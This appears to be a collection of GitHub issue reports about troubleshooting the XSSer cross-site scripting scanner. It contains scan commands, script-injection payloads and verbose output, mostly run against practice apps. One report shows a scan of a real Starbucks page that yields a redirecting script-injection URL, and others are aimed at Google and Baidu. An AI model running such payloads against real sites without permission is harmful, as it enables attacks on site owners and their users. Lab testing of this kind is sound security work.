Hello,
I've been trying to use the --payload command on mutillidae's DNS lookup page.
I already know (by manual injection) that <script> alert("text") </script> should work.
but while passing it through --payload="<script> alert("text") </script>"
the XSSer tries http://192.168.2.9/mutillidae/index.php?page=dns-lookup.php/<script>alert('hashed value')</script>
My intended response was rather http://192.168.2.9/mutillidae/index.php?page=dns-lookup.php/ "> <script>alert('hashed value')</script>
The URL (in bold) is a failed injection while the one below is a successful one.
How do I get it to work?
my exact command was:
xsser -u "http://192.168.2.9/mutillidae/index.php?page=dns-lookup.php" --payload="<script> alert("text") </script">
i also tried adding --no-head as suggested in other issues previously.
look forward to your response.
Thanks!
EDIT: Haven't updated XSSer in 3-4 weeks is that the issue? will update and confirm the same

Hey,

I've read some of the previous issues reporting problems with HTTPS resources.

I seem to be able to run tests against non-SSL sources but I still can't get around the limitation for https sites.

I tried using --no-head in order to bypass the initial notice. I also ran update-ca-certificates in order to get these updated as well.

curl -I calls work properly and render the resources as expected. But when I run xsser with a verbose flag, all responses return http code 0.

Since I wasn't sure how up-to-date xsser is in Kali, I pulled the latest version from this repository but I'm facing the very same problems.

The target URL seems to be intact. I'm testing several different sites with the standard format, i.e. https://example.com/?s= or https://example.com/index.php?s=.

Any thoughts or observations? I think that Python's raw curl callback may return http 0 by default as seen in https://superuser.com/questions/854101/whats-the-exit-code-for-curl-i-when-not-http-200

I've installed the most recent XSSer from the git repo with all of the required libraries, but it looks like it's not even establishing a network connection for some reason:

$ xsser -u "https://www.google.com"
===========================================================================

XSSer v1.7b: "ZiKA-47 Swarm!" - 2011/2016 - (GPLv3.0) -> by psy

===========================================================================
Testing [XSS from URL]...
===========================================================================

[Info] HEAD alive check for the target: (https://www.google.com) is FAILED(0) [DISCARDED]

===========================================================================

Mosquito(es) landed!

===========================================================================

I've tried various flags including disabling the HEAD check:

$ xsser -u "https://www.google.com" --no-head
===========================================================================

XSSer v1.7b: "ZiKA-47 Swarm!" - 2011/2016 - (GPLv3.0) -> by psy

===========================================================================
Testing [XSS from URL]...
===========================================================================
===========================================================================
Target: https://www.google.com --> 2017-12-20 17:33:29.180086
===========================================================================

---------------------------------------------
[-] Hashing: 3247c65fe58d70e02d17f21f87b93427
[+] Trying: https://www.google.com/">3247c65fe58d70e02d17f21f87b93427
[+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
[-] Injection Results:

XSSer is not working properly!:
 - Is something blocking connection(s)?
 - Is target url ok?: (https://www.google.com)

===========================================================================

Mosquito(es) landed!

===========================================================================
[*] Final Results:
===========================================================================

- Injections: 1
- Failed: 1
- Successful: 0
- Accur: 0 %

===========================================================================

[I] Could not find any vulnerability!. Try another combination or hack it -manually- :)

===========================================================================

And when specifying an interception proxy, no network connections are being made that I can see.

Any ideas?

I have a list of dork.
When I tried to search website by using dork , my cmd was : xsser -l /root/Desktop/dork.txt --De bing , but it started to search with duckduckgo , what should I do now ? Thanks

Hello,

I'm running xsser with --wizard with target mysite and with all other default settings

after connection it run max 2 test and then it return this error:

Traceback (most recent call last):
File "/usr/local/bin/xsser", line 5, in
pkg_resources.run_script('xsser==1.6', 'xsser')
File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/pkg_resources.py", line 492, in run_script
self.require(requires)[0].run_script(script_name, ns)
File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/pkg_resources.py", line 1350, in run_script
execfile(script_filename, namespace, namespace)
File "/Library/Python/2.7/site-packages/xsser-1.6-py2.7.egg/EGG-INFO/scripts/xsser", line 38, in
app.land(True)
File "/Library/Python/2.7/site-packages/xsser-1.6-py2.7.egg/core/main.py", line 1966, in land
self.hub.shutdown()
File "/Library/Python/2.7/site-packages/xsser-1.6-py2.7.egg/core/tokenhub.py", line 66, in shutdown
self.socket.shutdown(socket.SHUT_RDWR)
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 228, in meth
return getattr(self._sock,name)(*args)
socket.error: [Errno 57] Socket is not connected

how can i fix it?

Hello,

Python 2.x will no longer be supported by their upstream developers in 2020. Thus Debian developers are actively removing Python 2 support in Debian Testing with the goal of getting rid of Python 2 in Debian 11 (bullseye).
Kali is tracking Debian Testing and is thus affected by this. You should consider to switch xsser to Python 3.

FWIW this is tracked in https://gitlab.com/kalilinux/packages/xsser/issues/1 on the Kali side.

Hi,
I'm having some problems injecting simple XSS into POST method. My setup is as follows:
A Kali Linux 2017.1 VM with xxser 1.7b
A WebGoat vulnerable web-app installed on a Debian 9.10 VM
Both VMs are running on a host Windows 10 machine.

I'm able to inject a simple "aaa<script>alert(1)</script>" in the WebGoat "Phishing with XSS" page to get an alert.

However, when I run the following xsser command, I'm unable to get the alert, and xsser shows a failed injection.

xsser --statistics --verbose --url='http://192.168.247.128/WebGoat/attack?Screen=1382523204&menu=900' -p "Username=XSS&SUBMIT=Search" --cookie='JSESSIONID=133E98839FD47DF220A3AF26DB42C219' --checkmethod=POST --payload="aaa%3Cscript%3Ealert(1)%3C%2Fscript%3E" --proxy="http://localhost:8080"
xsser output:

===========================================================================

XSSer v1.7b: "ZiKA-47 Swarm!" - 2011/2016 - (GPLv3.0) -> by psy

===========================================================================
Testing [XSS from URL]...
===========================================================================

[-]Verbose: active
[-]Cookie: JSESSIONID=133E98839FD47DF220A3AF26DB42C219
[-]HTTP User Agent: Googlebot/2.1 (+http://www.google.com/bot.html)
[-]HTTP Referer: None
[-]Extra HTTP Headers: None
[-]X-Forwarded-For: None
[-]X-Client-IP: None
[-]Authentication Type: None
[-]Authentication Credentials: None
[-]Proxy: http://localhost:8080
[-]Timeout: 30
[-]Delaying: 0 seconds
[-]Delaying: 0 seconds
[-]Retries: 1 

[Info] HEAD alive check for the target: (http://192.168.247.128/WebGoat/attack?Screen=1382523204&menu=900) is OK(200) [AIMED]


Sending POST: Username=XSS&SUBMIT=Search 

===========================================================================
Target: http://192.168.247.128/WebGoat/attack?Screen=1382523204&menu=900 --> 2017-10-23 22:16:49.907274
===========================================================================

---------------------------------------------
[+] Trying: Username=XSS&SUBMIT=Searchaaa%3Cscript%3Ealert(1)%3C%2Fscript%3E
[-] Headers Results:

Connection: close
Cache-control: no-cache, no-store
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
http-code: 200
total-time: 0.021438
namelookup-time: 4.2e-05
connect-time: 0.000173
header-size: 187
request-size: 453
response-code: 200
ssl-verifyresult: 0
content-type: text/html; charset=utf-8
cookielist: []

---------------------------------------------
[-] Injection Results:
[+] Checking: url attack with aaa%3Cscript%3Ealert(1)%3C%2Fscript%3E... fail

Searching hash: 45b8ed3c88cc029ed9a81bb79e86c88d in target source code...

Injection failed!

===========================================================================

Mosquito(es) landed!

===========================================================================
[*] Final Results:
===========================================================================

- Injections: 1
- Failed: 1
- Sucessfull: 0
- Accur: 0 %

===========================================================================

===========================================================================
[*] Statistic:
===========================================================================
--------------------------------------------------
Test Time Duration:  0:00:05.142903
--------------------------------------------------
Total Connections: 2
-------------------------
200-OK: 2 | 404: 0 | 503: 0 | Others: 0
Connec: 100 %
--------------------------------------------------
Total Payloads: 1
-------------------------
Checker: 0 | Manual: 1 | Auto: 0 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
--------------------------------------------------
Total Injections: 1
-------------------------
Failed: 1 | Sucessfull: 0
Accur : 0 %
-------------------------
Total Discovered: 0
-------------------------
Checker: 0 | Manual: 0 | Auto: 0 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
--------------------------------------------------
False positives: 0 | Vulnerables: 0
-------------------------
Mana: 350
--------------------------------------------------
[I] Could not find any vulnerability!. Try another combination or hack it -manually- :)

===========================================================================

Apparently xsser didn't replace the XSS in the POSTDATA with the payload, but rather, just appended it to the end of the POSTDATA. This was confirmed in Burp Suite.

After modifying the command to the following:
xsser --statistics --verbose --url='http://192.168.247.128/WebGoat/attack?Screen=1382523204&menu=900' -p "SUBMIT=Search&Username=XSS" --cookie='JSESSIONID=133E98839FD47DF220A3AF26DB42C219' --checkmethod=POST --payload="aaa%3Cscript%3Ealert(1)%3C%2Fscript%3E" --proxy="http://localhost:8080"

I get the following output:

===========================================================================

XSSer v1.7b: "ZiKA-47 Swarm!" - 2011/2016 - (GPLv3.0) -> by psy

===========================================================================
Testing [XSS from URL]...
===========================================================================

[-]Verbose: active
[-]Cookie: JSESSIONID=133E98839FD47DF220A3AF26DB42C219
[-]HTTP User Agent: Googlebot/2.1 (+http://www.google.com/bot.html)
[-]HTTP Referer: None
[-]Extra HTTP Headers: None
[-]X-Forwarded-For: None
[-]X-Client-IP: None
[-]Authentication Type: None
[-]Authentication Credentials: None
[-]Proxy: http://localhost:8080
[-]Timeout: 30
[-]Delaying: 0 seconds
[-]Delaying: 0 seconds
[-]Retries: 1 

[Info] HEAD alive check for the target: (http://192.168.247.128/WebGoat/attack?Screen=1382523204&menu=900) is OK(200) [AIMED]


Sending POST: SUBMIT=Search&Username=XSS 

===========================================================================
Target: http://192.168.247.128/WebGoat/attack?Screen=1382523204&menu=900 --> 2017-10-23 22:20:26.191490
===========================================================================

---------------------------------------------
[+] Trying: SUBMIT=Search&Username=XSSaaa%3Cscript%3Ealert(1)%3C%2Fscript%3E
[-] Headers Results:

Connection: close
Cache-control: no-cache, no-store
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
http-code: 200
total-time: 0.023588
namelookup-time: 0.000125
connect-time: 0.000338
header-size: 187
request-size: 453
response-code: 200
ssl-verifyresult: 0
content-type: text/html; charset=utf-8
cookielist: []

---------------------------------------------
[-] Injection Results:
[+] Checking: url attack with aaa%3Cscript%3Ealert(1)%3C%2Fscript%3E... fail

Searching hash: 90414d88c726ab7ff75b578642504207 in target source code...

Injection failed!

===========================================================================

Mosquito(es) landed!

===========================================================================
[*] Final Results:
===========================================================================

- Injections: 1
- Failed: 1
- Sucessfull: 0
- Accur: 0 %

===========================================================================

===========================================================================
[*] Statistic:
===========================================================================
--------------------------------------------------
Test Time Duration:  0:00:05.147587
--------------------------------------------------
Total Connections: 2
-------------------------
200-OK: 2 | 404: 0 | 503: 0 | Others: 0
Connec: 100 %
--------------------------------------------------
Total Payloads: 1
-------------------------
Checker: 0 | Manual: 1 | Auto: 0 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
--------------------------------------------------
Total Injections: 1
-------------------------
Failed: 1 | Sucessfull: 0
Accur : 0 %
-------------------------
Total Discovered: 0
-------------------------
Checker: 0 | Manual: 0 | Auto: 0 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
--------------------------------------------------
False positives: 0 | Vulnerables: 0
-------------------------
Mana: 350
--------------------------------------------------
[I] Could not find any vulnerability!. Try another combination or hack it -manually- :)

===========================================================================

This time, checking the response in Burp Suite shows that the alert is indeed inside. However, xsser still reports a failed injection. I notice that only HEAD and POST methods were logged in Burp Suite when xsser runs, but during manual injection with a browser, POST and quite a few GETs were logged. This is also confirmed in the server logs shown below.

Server logs for manual injection:

192.168.247.1 - - [24/Oct/2017:10:09:39 +0800] "POST /WebGoat/attack?Screen=1382523204&menu=900 HTTP/1.1" 200 1021 "http://192.168.247.128/WebGoat/start.mvc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.247.1 - - [24/Oct/2017:10:09:39 +0800] "GET /WebGoat/service/lessoninfo.mvc HTTP/1.1" 200 466 "http://192.168.247.128/WebGoat/start.mvc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.247.1 - - [24/Oct/2017:10:09:41 +0800] "GET /WebGoat/service/lessonplan.mvc HTTP/1.1" 200 1064 "http://192.168.247.128/WebGoat/start.mvc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.247.1 - - [24/Oct/2017:10:09:41 +0800] "GET /WebGoat/service/solution.mvc HTTP/1.1" 200 1879 "http://192.168.247.128/WebGoat/start.mvc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.247.1 - - [24/Oct/2017:10:09:41 +0800] "GET /WebGoat/service/source.mvc HTTP/1.1" 200 8396 "http://192.168.247.128/WebGoat/start.mvc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.247.1 - - [24/Oct/2017:10:09:41 +0800] "GET /WebGoat/service/cookie.mvc HTTP/1.1" 200 506 "http://192.168.247.128/WebGoat/start.mvc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.247.1 - - [24/Oct/2017:10:09:41 +0800] "GET /WebGoat/service/lessonprogress.mvc HTTP/1.1" 200 449 "http://192.168.247.128/WebGoat/start.mvc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.247.1 - - [24/Oct/2017:10:09:41 +0800] "GET /WebGoat/service/hint.mvc HTTP/1.1" 200 4648 "http://192.168.247.128/WebGoat/start.mvc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.247.1 - - [24/Oct/2017:10:09:41 +0800] "GET /WebGoat/service/lessonmenu.mvc HTTP/1.1" 200 11285 "http://192.168.247.128/WebGoat/start.mvc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"

Server logs for xsser injection:

192.168.247.1 - - [24/Oct/2017:10:08:36 +0800] "HEAD /WebGoat/attack?Screen=1382523204&menu=900 HTTP/1.1" 200 230 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
192.168.247.1 - - [24/Oct/2017:10:08:36 +0800] "POST /WebGoat/attack?Screen=1382523204&menu=900 HTTP/1.1" 200 1688 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"

There seems to be 2 things wrong here:

1. xsser isn't replacing the "XSS" string in POSTDATA with the payload, but instead just appends the payload to the POSTDATA.
2. No GET methods after POST, and doesn't detect the payload in the HTTP response, leading to a failed injection.

hi, when i install with command "python setup.py install", the console prints error as follows:

running install_data
Traceback (most recent call last):
File "setup.py", line 55, in
test_suite = "tests"
File "C:\Python27\lib\distutils\core.py", line 151, in setup
dist.run_commands()
File "C:\Python27\lib\distutils\dist.py", line 953, in run_commands
self.run_command(cmd)
File "C:\Python27\lib\distutils\dist.py", line 972, in run_command
cmd_obj.run()
File "C:\Python27\lib\site-packages\setuptools\command\install.py", line 67, i
n run
self.do_egg_install()
File "C:\Python27\lib\site-packages\setuptools\command\install.py", line 109,
in do_egg_install
self.run_command('bdist_egg')
File "C:\Python27\lib\distutils\cmd.py", line 326, in run_command
self.distribution.run_command(command)
File "C:\Python27\lib\distutils\dist.py", line 972, in run_command
cmd_obj.run()
File "C:\Python27\lib\site-packages\setuptools\command\bdist_egg.py", line 181
, in run
self.do_install_data()
File "C:\Python27\lib\site-packages\setuptools\command\bdist_egg.py", line 133
, in do_install_data
self.call_command('install_data', force=0, root=None)
File "C:\Python27\lib\site-packages\setuptools\command\bdist_egg.py", line 147
, in call_command
self.run_command(cmdname)
File "C:\Python27\lib\distutils\cmd.py", line 326, in run_command
self.distribution.run_command(command)
File "C:\Python27\lib\distutils\dist.py", line 972, in run_command
cmd_obj.run()
File "C:\Python27\lib\distutils\command\install_data.py", line 58, in run
dir = convert_path(f[0])
File "C:\Python27\lib\distutils\util.py", line 124, in convert_path
raise ValueError, "path '%s' cannot be absolute" % pathname
ValueError: path '/usr/share/doc/xsser/' cannot be absolute

Has anyone solved the same problem? Looking forward to ur help. Thanks!

in python 3.7.14
solved by int(self.options.threads)

Describe the bug
I have tried to pass a host file using wizard, also manually using the command below
xsser -i ~/bounty/resolve/hostlist.txt -g '/'
the hostfile has lines as below
https://domain1.com
http://domain2.com

The error message i get is "[Error] XSSer cannot find a correct place to start an attack. Aborting!..."

I have attached the screenshots of the issue of both methods
without wizard below

using wizard below

I am demo'ing xsser against a simple vulnerable web application I created (https://github.com/cherdt/noople).

I ran the following command:

/usr/bin/xsser -u http://127.0.0.1:5000 -g '/?q=XSS' --auto

Although xsser reports 558 injections and 558 failures, I can confirm that xsser was in fact successful on numerous attempts. I suspect I'm missing something from my command.

I am using xsser v1.7b on Kali Linux 4.19.

Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux

root@kali:~/xsser/xsser# xsser --update
Traceback (most recent call last):
File "/usr/local/bin/xsser", line 4, in
import('pkg_resources').run_script('xsser==1.7', 'xsser')
File "/usr/local/lib/python3.6/dist-packages/pkg_resources/init.py", line 661, in run_script
self.require(requires)[0].run_script(script_name, ns)
File "/usr/local/lib/python3.6/dist-packages/pkg_resources/init.py", line 1441, in run_script
exec(code, namespace, namespace)
File "/usr/local/lib/python3.6/dist-packages/xsser-1.7-py3.6.egg/EGG-INFO/scripts/xsser", line 24, in
from core.main import xsser
File "/usr/local/lib/python3.6/dist-packages/xsser-1.7-py3.6.egg/core/main.py", line 234
print msg
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(msg)?

Hi,

I see a new version (1.7) has been released but on the OWASP Xsser project page they state Xsser is an inactive project. I think the community would benefit from seeing the project is alive and thriving.

Is there any chance it could be "brought back to life" on the OWASP website?

Additionally, the current Kali Linux distribution ships with xsser 1.6. I'm not sure whether a revamp of the project status on the OWASP website would make any difference for that.

i got some problem on running,note that socket problem?

Example :

# xsser  -u "https://www.starbucks.com/store-locator?map=38.947636,-94.683637,11z&place=XSS" --reverse-check

 [ https://www.starbucks.com/store-locator?map=38.947636,-94.683637,11z&place=XSS ]

[!] Hashing:

 [ 444ef6f1117eff2584f0781a7f1a38f5 ] : [ place ]

[*] Trying:

https://www.starbucks.com/store-locator?map=38.947636%2C-94.683637%2C11z&place=%22%3E444ef6f1117eff2584f0781a7f1a38f5

---------------------------------------------

[+] Vulnerable(s):

 [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

---------------------------------------------

=============================================
[*] Injection(s) Results:
=============================================

 [ FOUND! ] -> [ 444ef6f1117eff2584f0781a7f1a38f5 ] : [ place ] -> [ ">PAYLOAD ]

-------------------------

[Info] Generating 'token' url:

https://www.starbucks.com/store-locator?map=38.947636,-94.683637,11z&place="><script>document.location=document.location.hash.substring(1)</script>"><script>document.location=document.location.hash.substring(1)</script>#http://localhost:19084/success/444ef6f1117eff2584f0781a7f1a38f5

==================================================

[Info] CONGRATULATIONS!!! <-> This vector is doing a remote connection... So, is: 100% VULNERABLE! ;-)

https://www.starbucks.com/store-locator?map=38.947636,-94.683637,11z&place=XSS

==================================================

==================================================
Mosquito(es) landed!
==================================================

===========================================================================
[*] Final Results:
===========================================================================

- Injections: 1
- Failed: 0
- Successful: 1
- Accur: 100.0 %

===========================================================================
[*] List of XSS injections:
===========================================================================

You have found: [ 1 ] XSS vector(s)! -> [100% VULNERABLE]

---------------------

[+] Target: https://www.starbucks.com/store-locator?map=38.947636,-94.683637,11z&place=XSS
[+] Vector: [ place ]
[!] Method: URL
[*] Hash: 444ef6f1117eff2584f0781a7f1a38f5
[*] Payload: https://www.starbucks.com/store-locator?map=38.947636%2C-94.683637%2C11z&place=%22%3E444ef6f1117eff2584f0781a7f1a38f5
[!] Vulnerable: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
[!] Status: XSS FOUND!
 --------------------------------------------------

can i use my own payloads ? if yes , i wanna know what should i write

Whenever I use the wizard on any site I receive: [Error] Crawlering system is not receiving feedback... aborting! :(

Please Help!

When I used xsser --gtk , then I ran fly , map tab showed nothing , in cmd it said" XSSer.py: error: no such option: --no-head "
What should I suppose to do ? Thanks

Hello,
I have a problem trying to inject in a post parameter in mutillidae(broken web aplication OWASP).

url: http://10.0.2.19/mutillidae/index.php?page=dns-lookup.php

There is a input via POST that when i try it manually with <script>alert(1)</script> work fine.
I take the data with burp suite:
post-data= "target_host="
The command is:

./xsser -u "http://10.0.2.19/mutillidae/index.php?page=dns-lookup.php" -p "target_host=" --user-agent "Googlebot/2.1 (+http://www.google.com/bot.html)" --threads 1 --timeout 30 --retries 1 --delay 0 --payload="<script>alert(1)</script>" --cookie="PHPSESSID=41mfckj2obt9tju3m640j5r1p7; path=/, showhints=1"

XSSer is not working propertly!:

• Is something blocking connection(s)?
• Is target url ok?: (http://10.0.2.19/mutillidae/index.php?page=dns-lookup.php)

Mosquito(es) landed!

[*] Final Results:

• Injections: 1
• Failed: 1
• Sucessfull: 0
• Accur: 0 %

I have been testing others vulnerable web application and always having same error.
I tried without cookies and without user agent.

I dont know if im making a mistake in the command or is a issue.

Thanks, Miguel.

Hello,

I know, that site vulnerable with next xss (full URL with payload):

https://www.site.com/?xy6da"-alert('HACKED')-"u5lxn=1

But I can reproduce this XSS only in IE after I turned off internal XSS protection. I plan to exploit and create encoded POC of thi XSS with xsser latest version 1.7 inside kali, but seems I doing something wrong, xsser can't find/detect this xss.

Can you please advice right options?

Thank you,
Dmitry

I've set up a DVWA instance (http://www.dvwa.co.uk/) and had xsser find vulnerabilities in it.
Unfortunately, nothing is found. Maybe I am doing anything wrong?
xsser.txt

The commandline was:
xsser -u "http://localhost/vulnerabilities/xss_r/" -g "?name=XSS" --cookie="PHPSESSID=14ksro241tdlv03j0poamv7e3m; security=low" --auto --no-head -v

Describe the bug
When viewing the README in my browser, at the project/repository's root, the embedded images are broken. They do not load.

To Reproduce

1. In your web browser, go to https://github.com/epsylon/xsser or https://github.com/epsylon/xsser/blob/master/README.md
2. Scroll down until you see the appropriate broken image icon for your browser.

Expected behavior
The screenshots should load without failure and provide helpful visuals to the human eye.

Screenshots

Running environment:
N/A

Target details:
N/A

Additional context
N/A

i am dealing with this problem , whenever i start xsser -- gtk and put the the required website and Aim then fly, I end up with xsser getting closed after some time automatically,i guess there is a bug , i am using xsser v1.6 beta version

XSSer v1.7 (beta): "Total Swarm!" - 2013 - (GPLv3.0) -> by psy

Testing [XSS from URL] injections... looks like your target is good defined ;)

Internal error getting -payloads- error
Traceback (most recent call last):
  File "/root/xsser-public/xsser-public/core/main.py", line 1437, in try_running
    return func(*args)
  File "/root/xsser-public/xsser-public/core/main.py", line 285, in get_payloads
    payloads_css    = core.fuzzing.vectors.vectors_css
AttributeError: 'module' object has no attribute 'vectors_css'

HEAD alive check for the target: (http://www.baidu.com?a=b) is OK(200) [AIMED]


Internal problems running attack:  error
Traceback (most recent call last):
  File "/root/xsser-public/xsser-public/core/main.py", line 1437, in try_running
    return func(*args)
  File "/root/xsser-public/xsser-public/core/main.py", line 1688, in attack
    self.attack_url(url, payloads, query_string)
  File "/root/xsser-public/xsser-public/core/main.py", line 641, in attack_url
    for payload in payloads:
TypeError: 'NoneType' object is not iterable

Mosquito(s) landed!

Hello,

I am trying to test a reflected XSS vulnerability in Damn vulnerable web application.

I use this command:
xsser -u "http://10.0.2.5/vulnerabilities/xss_r/" -g "?name=XSS" --cookie="PHPSESSID=5376nqb49o4itt41pglhef9hu2; security=low" --no-head --hash -v --proxy http://127.0.0.1:8080

Afaik, the program sends a GET request to http://10.0.2.5/vulnerabilities/xss_r/?name=2f797f2d18b337c71d5a736c7510f0d5 and then searches for the 2f797f2d18b337c71d5a736c7510f0d5 hash in the response body to check whether the server repeats the hash.

However, while checking the hash, the program checks a different hash from the previously sent hash in the GET request.

#~$xsser -u "http://10.0.2.5/vulnerabilities/xss_r/" -g "?name=XSS" --cookie="PHPSESSID=5376nqb49o4itt41pglhef9hu2; security=low" --no-head --hash -v --proxy http://127.0.0.1:8080
===========================================================================

XSSer v1.7b: "ZiKA-47 Swarm!" - 2011/2016 - (GPLv3.0) -> by psy

===========================================================================
Testing [XSS from URL]...
===========================================================================

[-]Verbose: active
[-]Cookie: PHPSESSID=5376nqb49o4itt41pglhef9hu2; security=low
[-]HTTP User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
[-]HTTP Referer: None
[-]Extra HTTP Headers: None
[-]X-Forwarded-For: None
[-]X-Client-IP: None
[-]Authentication Type: None
[-]Authentication Credentials: None
[-]Proxy: http://127.0.0.1:8080
[-]Timeout: 30
[-]Delaying: 0 seconds
[-]Delaying: 0 seconds
[-]Retries: 1 

===========================================================================
Target: http://10.0.2.5/vulnerabilities/xss_r/ --> 2019-07-08 18:23:51.409877
===========================================================================

---------------------------------------------
[+] Trying: http://10.0.2.5/vulnerabilities/xss_r/?name=2f797f2d18b337c71d5a736c7510f0d5
[-] Headers Results:

Date: Mon, 08 Jul 2019 14:40:20 GMT
Server: Apache/2.4.25 (Debian)
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 0
Vary: Accept-Encoding
Content-Length: 4387
Connection: close
http-code: 200
total-time: 0.016762
namelookup-time: 2.6e-05
connect-time: 0.00011
header-size: 312
request-size: 451
response-code: 200
ssl-verifyresult: 0
content-type: text/html;charset=utf-8
cookielist: []

---------------------------------------------

[-] Injection Results:
[+] Checking: url attack with 2f797f2d18b337c71d5a736c7510f0d5... fail

Searching hash: c70c3b71646ad1a36305f04b91419ccb in target source code...

Injection failed!

===========================================================================

Mosquito(es) landed!

===========================================================================
[*] Final Results:
===========================================================================

- Injections: 1
- Failed: 1
- Successful: 0
- Accur: 0 %

===========================================================================

[!] Checker: looks like your target doesn't repeat code received.

===========================================================================

The program sent 2f797f2d18b337c71d5a736c7510f0d5 hash but while checking the repetition in the response it is looking for c70c3b71646ad1a36305f04b91419ccb hash. I checked the request and the response with Burp and the 2f797f2d18b337c71d5a736c7510f0d5 hash was in the both request and response without any encoding.

Hello
I am testing http://testphp.vulnweb.com/search.php?test=query which is a known vulnerable site for testing purposes. It has a real XSS vulnerability.

To Reproduce

1. tcpdump -i any port 19084 -A
2. python3 xsser --auto -u "http://testphp.vulnweb.com/search.php?test=query" -p "searchFor=XSS&goButton=go" --reverse-check

Result of the scan** ( only final part )
`==================================================

http://testphp.vulnweb.com/search.php?test=querysearchFor=

==================================================

CONGRATULATIONS!!! <-> This vector is doing a remote connection... So, is: 100% VULNERABLE! ;-)

http://testphp.vulnweb.com/search.php?test=query

==================================================

Final Results:

• Injections: 1291
• Failed: 4
• Successful: 1287
• Accur: 99.69016266460109 %

List of XSS injections:

You have found: 1287 XSS vector(s)! -> 100% VULNERABLE`

However,the tcpdump does not capture a single packet!

Running environment:

• XSSer 1.8.2 latest release
• Installation method git
• Operating system: Linux 5.3.0-kali3-amd64
• Python version: Python 3.7.5
• No virtualization

Target details:
--Reverse-check check says that connection is successful but I am not able to capture any packet from that on port 19084.

Best Regards

hi there -

running setup.py build and setup.py make from source package on osx both throwing error: [Errno 21] Is a directory: 'xsser'. it created the build folder though and added my system info. same errors when run as sudo. all dependencies installed with pip and brew and my path is good to go. not sure what the error could be caused by, but while researching i saw a few other projects were having similar problems. are there any logs that would be useful?

thank you!

Traceback (most recent call last):
File "./xsser", line 37, in
app.run()
File "/Users/erichuang1933/script/xsser/xsser/core/main.py", line 2010, in run
self.print_results()
File "/Users/erichuang1933/script/xsser/xsser/core/main.py", line 2612, in print_results
c = Curl()
File "/Users/erichuang1933/script/xsser/xsser/core/curlcontrol.py", line 76, in init
self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_0)
AttributeError: 'module' object has no attribute 'SSLVERSION_TLSv1_0'

Hi,
I noticed that your setup.py still mentioned version = "1.6" but you released version 1.7
I think that the version in the setup should be the same as the release version.
Thanks!

Describe the bug
i can't run the tool ( i have python2.7.17 installed and i imported the modules but when i tried to run the tool the same error appears..)

1. i installed the tool but i saw this error:
2. ┌─[user@parrot]─[~/xsser]
   └──╼ $./xsser
   Traceback (most recent call last):
   File "./xsser", line 22, in
   from core.main import xsser
   File "/home/user/xsser/core/main.py", line 22, in
   import os, re, sys, datetime, hashlib, time, urllib.request, urllib.parse, urllib.error, cgi, traceback, webbrowser, random
   ImportError: No module named request

Running environment:

• XSSer version 1.8.2
• Installation method github
• Operating system: Parrot GNU/Linux 4.8
• Python version: i have both installed but i was using python 2.7.17 at this moment
• kernel Linux 5.4.0-3parrot1-amd64
• the system is udpated

what should i do ?

thanks

Any link i try xsser can't find it

File "/usr/local/lib/python2.7/dist-packages/XSSer/crawler.py", line 217, in _emergency_parse
data_len = len(html_data)
crawler error: object of type 'NoneType' has no len() http://example

Hi,

Is there any way I can make google search engine working with XSSer ?

./xsser -d 'search.php?q=' --De=google

XSSer v1.7b: "ZiKA-47 Swarm!" - 2011/2018 - (GPLv3.0) -> by psy

===========================================================================
Testing [XSS from Dork-Query]... Good luck! ;-)

[Error] This search engine is not supported!

[Info] List of available:

• bing
• yahoo

===========================================================================

Mosquito(es) landed!

===========================================================================

Add a quick .gitignore file so we can use virtualenvs and and ignore pyc files as well.

`
From f4dc7e816f6f37c7916c43cc12bfe5c8c8f555dc Mon Sep 17 00:00:00 2001
From: Odinn [email protected]
Date: Fri, 14 Oct 2016 04:49:25 +0300
Subject: [PATCH] add .gitignore file to ignore virtualenv and .pyc files

.gitignore | 3 +++
1 file changed, 3 insertions(+)
create mode 100644 .gitignore

diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..d22d9b3
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,3 @@
+virtualenv
+virtualenv/*

+*.pyc

2.8.4 (Apple Git-73)
